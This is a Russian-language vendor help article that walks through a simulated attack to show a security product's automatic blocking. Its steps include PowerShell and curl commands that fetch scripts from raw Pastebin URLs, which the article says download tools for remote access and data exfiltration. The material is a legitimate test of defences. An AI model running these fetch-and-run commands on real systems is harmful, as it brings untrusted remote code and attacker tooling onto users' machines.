Демонстрация того, как Dynamic Prevention защищает вашу сеть

Обзор

Dynamic Prevention — это движок безопасности на основе поведения, который активно применяет динамические меры контроля в ответ на обнаруженные угрозы, чтобы уменьшить поверхность атаки и смягчить угрозы на ранней стадии до того, как произойдет воздействие. Для получения дополнительной информации см. Что такое Dynamic Prevention?

В этой статье моделируется сценарий реальной атаки, чтобы продемонстрировать, как Dynamic Prevention защищает вашу сеть. В этом примере пользователь загружает скрипт из Pastebin, который злоумышленник использует для попытки получения дополнительных инструментов высокого риска, необходимых для проведения атаки в будущем. Dynamic Prevention идентифицирует вредоносное поведение и блокирует загрузку инструмента, предотвращая атаку до того, как она сможет прогрессировать или произойдет воздействие.

Ответ на эту атаку полностью автоматизирован. Дополнительные правила не требуются. Достаточно просто включить Dynamic Prevention, чтобы предотвратить атаку.

Чтобы смоделировать эту атаку:

  1. Загрузите инструмент высокого риска без блокировки
  2. Загрузите скрипт из Pastebin
  3. Попробуйте загрузить инструменты высокого риска снова. На этот раз загрузка заблокирована.

Предварительные условия

  • Dynamic Prevention включен с действиями, установленными на Блокировать

Пункт 1: Загрузка высокорискового инструмента

Чтобы показать, что Dynamic Prevention блокирует действия только тогда, когда они являются частью вредоносной последовательности, сначала загрузите Rclone — инструмент командной строки с открытым исходным кодом для управления файлами. Злоумышленники часто используют Rclone в качестве инструмента после компрометации, поскольку он легитимный, мощный и сливается с обычной административной активностью.

Действие

Загрузите Rclone из одного из следующих источников:

  • Следующий URL: https://downloads.rclone.org/rclone-current-windows-amd64.zip
  • На устройствах Windows:

    • Следующая команда PowerShell: Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
  • На устройствах macOS/Linux:

    • Следующая команда терминала: curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"

Результат

Файл загружается успешно.

Объяснение

Это подтверждает, что в изоляции действие не блокируется, так как не считается вредоносным, если ему не предшествует подозрительная активность.

Пункт 2: Загрузка скрипта из Pastebin

Чтобы моделировать начало атаки, загрузите скрипт из Pastebin, который при выполнении загружает общие инструменты злоумышленника, например, Rclone и AnyDesk, для удаленного доступа и эксфильтрации.

Действие

Загрузите и выполните скрипт из Pastebin:

  • На устройствах Windows:

    • Следующая команда PowerShell: (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
  • На устройствах macOS/Linux:

    • Следующая команда терминала: curl -sSL "https://pastebin.com/raw/tXhVK2V7"

Результат

Скрипт выполняется и загружает инструменты. Динамическое управление применяется к хосту, который показан в виджете Хост с управлением на Панели управления угрозами безопасности. Для получения дополнительной информации см. Использование панели угроз безопасности.

Dynamic_Prevention1.png

Объяснение

Dynamic Prevention обнаруживает индикаторы подозрительного поведения и активно применяет меры контроля для блокировки последующих вредоносных действий, останавливая атаку до того, как произойдет воздействие.

Пункт 3: Загрузка высокорискового инструмента

В смоделированной атаке злоумышленник пытается загрузить Rclone. Однако поскольку это действие следует за подозрительной активностью загрузки скрипта из Pastebin и применяется мера контроля, Dynamic Prevention блокирует загрузку Rclone.

Действие

Загрузите Rclone из одного из следующих источников:

  • Следующий URL: https://downloads.rclone.org/rclone-current-windows-amd64.zip
  • На устройствах Windows:

    • Следующая команда PowerShell: Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
  • На устройствах macOS/Linux:

    • Следующая команда терминала: curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"

Результат

Загрузка этого файла заблокирована мерой контроля. Смягченная угроза отображается в виджете Хост с нейтрализованными угрозами на Панели управления угрозами безопасности.

DP5.png

Объяснение

В отличие от шага 1, где этот скрипт выполнялся в изоляции и поэтому был разрешен, загрузка этого скрипта теперь предшествовала подозрительному действию и была заблокирована Dynamic Prevention.

Демонстрация

Это видео показывает демонстрацию этой симулированной атаки:

Была ли эта статья полезной?

Пользователи, считающие этот материал полезным: 0 из 0

0 комментариев